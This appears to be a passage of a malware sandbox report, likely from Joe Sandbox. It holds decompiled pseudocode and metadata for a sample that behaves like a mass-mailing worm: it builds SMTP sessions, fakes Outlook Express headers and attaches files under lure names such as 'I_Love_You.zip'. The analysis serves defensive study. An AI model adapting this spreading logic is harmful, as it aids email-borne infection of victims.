                                                                          						_v1320 = _t195;
                                                                          						L004086D8();
                                                                          						_t222 = _t226 - 4;
                                                                          						if(_t195 == 0) {
                                                                          							goto L39;
                                                                          						} else {
                                                                          							_v40 =  *((intOrPtr*)( *(_t195[0xc])));
                                                                          							goto L4;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t138;
                                                                          			}


























































                                                                          0x0040619a
                                                                          0x004061c4
                                                                          0x004061c9
                                                                          0x004061cf
                                                                          0x004061d7
                                                                          0x004061d9
                                                                          0x004061de
                                                                          0x004061e8
                                                                          0x004061f2
                                                                          0x004061fc
                                                                          0x00406206
                                                                          0x00406210
                                                                          0x0040621a
                                                                          0x00406224
                                                                          0x0040623e
                                                                          0x00406249
                                                                          0x00406258
                                                                          0x00406263
                                                                          0x0040626e
                                                                          0x00406279
                                                                          0x0040628b
                                                                          0x00406296
                                                                          0x004062a8
                                                                          0x004062bd
                                                                          0x004062c2
                                                                          0x004062ca
                                                                          0x004062d2
                                                                          0x004062d9
                                                                          0x004062de
                                                                          0x004062e1
                                                                          0x004062e6
                                                                          0x0040672e
                                                                          0x0040672e
                                                                          0x00406731
                                                                          0x00406739
                                                                          0x004062ec
                                                                          0x004062ec
                                                                          0x004062f2
                                                                          0x004062f9
                                                                          0x00406301
                                                                          0x00406305
                                                                          0x00406308
                                                                          0x0040630b
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406319
                                                                          0x0040633b
                                                                          0x0040633b
                                                                          0x00406343
                                                                          0x00406346
                                                                          0x0040634a
                                                                          0x0040634d
                                                                          0x00406352
                                                                          0x00406358
                                                                          0x00000000
                                                                          0x0040635e
                                                                          0x0040635e
                                                                          0x00406368
                                                                          0x00000000
                                                                          0x0040636e
                                                                          0x00406371
                                                                          0x00406375
                                                                          0x0040637d
                                                                          0x00406383
                                                                          0x00406399
                                                                          0x00000000
                                                                          0x0040639f
                                                                          0x004063a2
                                                                          0x004063c4
                                                                          0x00000000
                                                                          0x004063ca
                                                                          0x004063cd
                                                                          0x004063ef
                                                                          0x00000000
                                                                          0x0040640d
                                                                          0x00406410
                                                                          0x00406432
                                                                          0x00000000
                                                                          0x00406438
                                                                          0x0040643b
                                                                          0x0040645d
                                                                          0x00000000
                                                                          0x00406463
                                                                          0x00406469
                                                                          0x0040648b
                                                                          0x00000000
                                                                          0x004064a9
                                                                          0x004064ac
                                                                          0x004064ce
                                                                          0x00000000
                                                                          0x004064ec
                                                                          0x004064ec
                                                                          0x004064ef
                                                                          0x004064f2
                                                                          0x004064f7
                                                                          0x004064fc
                                                                          0x004066b1
                                                                          0x00000000
                                                                          0x004066c7
                                                                          0x004066ca
                                                                          0x004066ce
                                                                          0x004066dc
                                                                          0x004066f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004066f2
                                                                          0x00406502
                                                                          0x00406514
                                                                          0x00000000
                                                                          0x00406532
                                                                          0x00406536
                                                                          0x00406564
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406538
                                                                          0x0040654a
                                                                          0x00000000
                                                                          0x00406550
                                                                          0x0040656a
                                                                          0x0040657c
                                                                          0x00000000
                                                                          0x00406582
                                                                          0x00406585
                                                                          0x00406589
                                                                          0x00406591
                                                                          0x00406597
                                                                          0x004065ad
                                                                          0x00000000
                                                                          0x004065cb
                                                                          0x004065ce
                                                                          0x004065f0
                                                                          0x00000000
                                                                          0x004065f6
                                                                          0x004065f9
                                                                          0x0040661b
                                                                          0x00000000
                                                                          0x00406639
                                                                          0x00406639
                                                                          0x00406658
                                                                          0x00406668
                                                                          0x0040667d
                                                                          0x00406682
                                                                          0x00406697
                                                                          0x00000000
                                                                          0x0040669d
                                                                          0x004066f4
                                                                          0x00406706
                                                                          0x00000000
                                                                          0x0040671c
                                                                          0x0040671c
                                                                          0x0040671f
                                                                          0x00406727
                                                                          0x00406727
                                                                          0x00406706
                                                                          0x0040666a
                                                                          0x0040666d
                                                                          0x00406672
                                                                          0x00000000
                                                                          0x00406672
                                                                          0x00406668
                                                                          0x0040661b
                                                                          0x004065f0
                                                                          0x004065ad
                                                                          0x0040657c
                                                                          0x0040654a
                                                                          0x00406536
                                                                          0x00406514
                                                                          0x004064fc
                                                                          0x004064ce
                                                                          0x0040648b
                                                                          0x0040645d
                                                                          0x00406432
                                                                          0x004063ef
                                                                          0x004063c4
                                                                          0x00406399
                                                                          0x00406368
                                                                          0x0040631b
                                                                          0x0040631b
                                                                          0x0040631e
                                                                          0x00406321
                                                                          0x00406326
                                                                          0x0040632b
                                                                          0x00000000
                                                                          0x00406331
                                                                          0x00406338
                                                                          0x00000000
                                                                          0x00406338
                                                                          0x0040632b
                                                                          0x00406319
                                                                          0x00406745

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf$FreeGlobalclosesocketlstrlen$SystemTimeconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                          • String ID: --xContext--$%s$--xContext$.$ &A$ &A$&A(&A,&A0&A4&A8&A<&A$%s, %d %s %d %d:%d:%d GMT$---$Content-Disposition: attachment; filename="%s"$Content-Transfer-Encoding: 8bit$Content-Transfer-Encoding: base64$Content-type: Application/Octet-stream; name="%s"; type:unknown$Content-type: Multipart/Mixed; boundary=xContext$Content-type: text/plain; charset=ISO-8859-1$Content-type: text/plain; charset=Windows-1251$DATA$Date: %s$FROM: <%s>$Fri$HELO %s$MAIL FROM: <%s>$MIME-Version: 1.0$Mon$QUIT$RCPT TO: <%s>$Sat$Subject: %s$Sun$TO: <%s>$Thu$Tue$Wed$X-Mailer: Microsoft Outlook Express 6.00.2800.1106
                                                                          • API String ID: 1487464711-219272833
                                                                          • Opcode ID: 6e1c86fa00bcade5783fd953f324a731212507fe40bf4bab4951a549fb1a204b
                                                                          • Instruction ID: 6e52e2717ca3ea0a11f7245c2747809bb71ce8739c615a88298817d05e4ee505
                                                                          • Opcode Fuzzy Hash: 6e1c86fa00bcade5783fd953f324a731212507fe40bf4bab4951a549fb1a204b
                                                                          • Instruction Fuzzy Hash: 53E12BB44087118AD710AF25D68429EBBF4AF44748F02897EF8C9A7385D77CC9A4CB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E00402288(void* __eax, char _a4) {
                                                                          				void* _v16;
                                                                          				char _v76;
                                                                          				char _v188;
                                                                          				char _v300;
                                                                          				char _v508;
                                                                          				char _v780;
                                                                          				char _v812;
                                                                          				char _v1068;
                                                                          				int _v1072;
                                                                          				signed int _v1088;
                                                                          				void* _v1128;
                                                                          				char _v1132;
                                                                          				void* _v1136;
                                                                          				int _v1140;
                                                                          				intOrPtr _v1148;
                                                                          				int _v1152;
                                                                          				char* _v1156;
                                                                          				void* _v1160;
                                                                          				char* _v1164;
                                                                          				void* _v1168;
                                                                          				void* _v1172;
                                                                          				void* _v1180;
                                                                          				void* _v1188;
                                                                          				void* _v1196;
                                                                          				char* _v1204;
                                                                          				signed int _v1208;
                                                                          				char* _v1212;
                                                                          				void* _t350;
                                                                          				void* _t351;
                                                                          				signed int _t352;
                                                                          				void* _t353;
                                                                          				signed int _t354;
                                                                          				int _t358;
                                                                          				void* _t359;
                                                                          				char _t363;
                                                                          				void* _t365;
                                                                          				void* _t367;
                                                                          				intOrPtr* _t369;
                                                                          				void** _t370;
                                                                          				intOrPtr* _t374;
                                                                          
                                                                          				_v1072 = 0;
                                                                          				_t363 = _a4;
                                                                          				_v1132 = _t363;
                                                                          				L0040C310();
                                                                          				_t367 = _t365 - 0x458;
                                                                          				_t358 = 0;
                                                                          				if(__eax <= 0x64) {
                                                                          					_t350 =  &_v1068;
                                                                          					memset(_t350, 0, 0xfa);
                                                                          					_v1132 = _t363;
                                                                          					_v1136 = _t350;
                                                                          					L0040C320();
                                                                          					_t369 = _t367 - 8;
                                                                          					_v1140 = "mvcsv.qyy";
                                                                          					_t351 =  &_v812;
                                                                          					 *_t369 = _t351;
                                                                          					E00404C38();
                                                                          					_v1136 = _t351;
                                                                          					_v1140 = 0x104;
                                                                          					 *_t369 =  &_v780;
                                                                          					E00404620();
                                                                          					 *_t369 = 6;
                                                                          					_t352 = E00404EAE();
                                                                          					 *_t369 = 6;
                                                                          					_v1088 = E00404EAE();
                                                                          					while(_t352 == _v1088) {
                                                                          						 *_t369 = 0xa;
                                                                          						Sleep(??);
                                                                          						_t369 = _t369 - 4;
                                                                          						 *_t369 = 6;
                                                                          						_v1088 = E00404EAE();
                                                                          					}
                                                                          					_v1136 = 0xc8;
                                                                          					_v1140 = 0;
                                                                          					 *_t369 =  &_v508;
                                                                          					memset(??, ??, ??);
                                                                          					_v1136 = 0x64;
                                                                          					_v1140 = 0;
                                                                          					 *_t369 =  &_v300;
                                                                          					memset(??, ??, ??);
                                                                          					_v1136 = 0x64;
                                                                          					_v1140 = 0;
                                                                          					 *_t369 =  &_v188;
                                                                          					memset(??, ??, ??);
                                                                          					_t359 =  &_v76;
                                                                          					asm("cld");
                                                                          					memset(_t359, 0, 0xa << 2);
                                                                          					_t370 = _t369 + 0xc;
                                                                          					_v1140 =  *(0x40d0c4 + _t352 * 4);
                                                                          					_t353 = _t359;
                                                                          					 *_t370 = _t359;
                                                                          					L0040C328();
                                                                          					_v1148 = 0x40ed9b;
                                                                          					_v1152 = _t353;
                                                                          					L0040C328();
                                                                          					_v1156 =  *((intOrPtr*)(0x40d0c4 + _v1088 * 4));
                                                                          					_v1160 = _t353;
                                                                          					L0040C328();
                                                                          					_v1164 = 0x40ed9d;
                                                                          					_v1168 = _t353;
                                                                          					L0040C328();
                                                                          					_t374 = _t370 - 0xfffffffffffffff0;
                                                                          					 *_t374 = 0x12;
                                                                          					_t354 = E00404EAE();
                                                                          					_v1172 = 0x40eda2;
                                                                          					 *_t374 =  &_v1068;
                                                                          					if(strstr(??, ??) != 0) {
                                                                          						 *_t374 = 8;
                                                                          						_t354 = E00404EAE() + 0x12;
                                                                          					}
                                                                          					if(_t354 <= 0x19) {
                                                                          						switch( *((intOrPtr*)(_t354 * 4 +  &M0040EE08))) {
                                                                          							case 0:
                                                                          								_v1172 =  *((intOrPtr*)(0x40d0e0 + _t354 * 4));
                                                                          								 *_t374 =  &_v188;
                                                                          								L0040C328();
                                                                          								_t375 = _t374 - 8;
                                                                          								 *_t375 = 8;
                                                                          								_v1180 =  *((intOrPtr*)(0x40d080 + E00404EAE() * 4));
                                                                          								 *_t375 =  &_v508;
                                                                          								L0040C328();
                                                                          								_t376 = _t375 - 8;
                                                                          								 *_t376 = 2;
                                                                          								_v1188 = 0x40d148[E00404EAE()];
                                                                          								 *_t376 =  &_v300;
                                                                          								L0040C328();
                                                                          								_t374 = _t376 - 8;
                                                                          								goto L31;
                                                                          							case 1:
                                                                          								__eax =  *0x40d150;
                                                                          								_v1172 =  *0x40d150;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1180 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 2:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d154; // 0x40eb4e
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 3:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d158; // 0x40eb5f
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 4:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d15c; // 0x40eb73
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 5:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(8);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d160; // 0x40eb86
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 6:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d098; // 0x40e5e0
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 7:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d09c; // 0x40e618
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 8:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d08c; // 0x40e558
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 9:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d088; // 0x40e508
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xa:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0a0; // 0x40e64c
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1188 = "admin@bigtits.com";
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xb:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(2);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xc:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1180 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1188 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0a4; // 0x40e688
                                                                          								_v1196 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__edx =  &_v76;
                                                                          								asm("cld");
                                                                          								__ecx = 0xa;
                                                                          								__eax = 0;
                                                                          								__edi = __edx;
                                                                          								__eax = memset(__edi, 0, 0xa << 2);
                                                                          								__edi = __edi + __ecx;
                                                                          								__ecx = 0;
                                                                          								_v1204 = "I_Love_You.zip";
                                                                          								_v1208 = __edx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xd:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x14);
                                                                          								_v1180 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(5);
                                                                          								_v1188 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0a8; // 0x40e6b2
                                                                          								_v1196 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__edx =  &_v76;
                                                                          								asm("cld");
                                                                          								__ecx = 0xa;
                                                                          								__eax = 0;
                                                                          								__edi = __edx;
                                                                          								__eax = memset(__edi, 0, 0xa << 2);
                                                                          								__edi = __edi + __ecx;
                                                                          								__ecx = 0;
                                                                          								_v1204 = "Happy_birthday_to_you.zip";
                                                                          								_v1208 = __edx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								goto L31;
                                                                          							case 0xe:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(2);
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x16);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(4);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0xf:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0b4; // 0x40e785
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								if(E00404EAE(2) != 0) {
                                                                          									__eax = E00404EAE(0x16);
                                                                          									_v1188 = __eax;
                                                                          									__ebx =  &_v300;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__eax = E00404EAE(4);
                                                                          									_v1196 = __eax;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__edx =  &_v76;
                                                                          									asm("cld");
                                                                          									__ecx = 0xa;
                                                                          									__eax = 0;
                                                                          									__edi = __edx;
                                                                          									__eax = memset(__edi, 0, 0xa << 2);
                                                                          									__edi = __edi + __ecx;
                                                                          									__ecx = 0;
                                                                          									_v1204 = 0x40ede1;
                                                                          									_v1208 = __edx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          								} else {
                                                                          									__eax = E00404EAE(0x15);
                                                                          									_v1188 = __eax;
                                                                          									__ebx =  &_v300;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__eax = E00404EAE(4);
                                                                          									_v1196 = __eax;
                                                                          									 *__esp = __ebx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          									__edx =  &_v76;
                                                                          									asm("cld");
                                                                          									__ecx = 0xa;
                                                                          									__eax = 0;
                                                                          									__edi = __edx;
                                                                          									__eax = memset(__edi, 0, 0xa << 2);
                                                                          									__edi = __edi + __ecx;
                                                                          									__ecx = 0;
                                                                          									_v1204 = 0x40ede1;
                                                                          									_v1208 = __edx;
                                                                          									L0040C328();
                                                                          									__esp = __esp - 8;
                                                                          								}
                                                                          								_v1212 = "mvcsvnd.qyy";
                                                                          								__ebx =  &_v812;
                                                                          								 *__esp = __ebx;
                                                                          								__eax = E00404C38();
                                                                          								_v1208 = __ebx;
                                                                          								_v1212 = 0x104;
                                                                          								__eax =  &_v780;
                                                                          								 *__esp =  &_v780;
                                                                          								__eax = E00404620();
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0x10:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0b8; // 0x40e7a0
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x16);
                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(4);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0x11:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0bc; // 0x40e7cc
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d148; // 0x40eb0c
                                                                          								_v1188 = __eax;
                                                                          								__eax =  &_v300;
                                                                          								 *__esp =  &_v300;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								goto L31;
                                                                          							case 0x12:
                                                                          								__eax =  *(0x40d0e0 + __ebx * 4);
                                                                          								_v1172 =  *(0x40d0e0 + __ebx * 4);
                                                                          								__eax =  &_v188;
                                                                          								 *__esp =  &_v188;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax =  *0x40d0c0; // 0x40e7f1
                                                                          								_v1180 = __eax;
                                                                          								__eax =  &_v508;
                                                                          								 *__esp =  &_v508;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(0x16);
